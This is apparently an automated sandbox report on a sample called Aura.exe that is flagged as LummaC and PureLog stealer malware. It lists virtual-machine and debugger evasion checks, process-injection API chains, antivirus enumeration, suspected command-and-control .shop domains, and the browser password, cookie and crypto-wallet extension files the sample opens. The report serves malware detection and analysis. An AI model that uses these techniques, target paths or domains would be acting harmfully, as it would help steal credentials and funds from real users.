Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Aura.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Aura.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Memory allocated: 1490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Memory allocated: 4EF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

Window / User API: threadDelayed 6694

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe TID: 7352	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe TID: 7720	Thread sleep count: 6694 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Aura.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Aura.exe	Last function: Thread delayed

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Aura.exe, 00000003.00000002.2898297311.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000003.00000002.2898113604.000000000169C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Aura.exe

API call chain: ExitProcess graph end node

graph_3-14908

Source: C:\Users\user\Desktop\Aura.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

Code function: 3_2_004430A0 LdrInitializeThunk,

3_2_004430A0

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_02EF8611 mov edi, dword ptr fs:[00000030h]		0_2_02EF8611
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_02EF878E mov edi, dword ptr fs:[00000030h]		0_2_02EF878E

Source: C:\Users\user\Desktop\Aura.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_02EF8611 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02EF8611

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Aura.exe

Memory written: C:\Users\user\Desktop\Aura.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Queries volume information: C:\Users\user\Desktop\Aura.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Aura.exe, 00000003.00000002.2898707506.0000000003C33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Aura.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Aura.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Aura.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Aura.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aura.exe.3ef9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aura.exe.3ef9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1654453374.0000000000BA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Aura.exe, 00000003.00000002.2898181611.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Aura.exe, 00000003.00000002.2898181611.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Aura.exe, 00000003.00000002.2898181611.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Aura.exe, 00000003.00000002.2898181611.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Aura.exe, 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
